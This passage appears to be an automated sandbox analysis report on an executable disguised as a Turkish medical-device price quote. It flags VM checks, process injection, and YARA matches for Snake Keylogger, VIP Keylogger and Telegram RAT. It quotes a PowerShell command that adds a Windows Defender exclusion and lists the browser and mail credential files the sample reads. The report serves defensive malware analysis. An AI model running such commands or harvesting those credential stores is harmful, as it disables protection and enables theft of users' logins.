                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595875Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595516Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595297Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594484Jump to behavior
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2242029986.0000000000D42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681909021.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_06579548 LdrInitializeThunk,6_2_06579548
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory written: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002966000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002AD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002966000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002AD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4683212312.0000000002AD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4683212312.000000000292A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
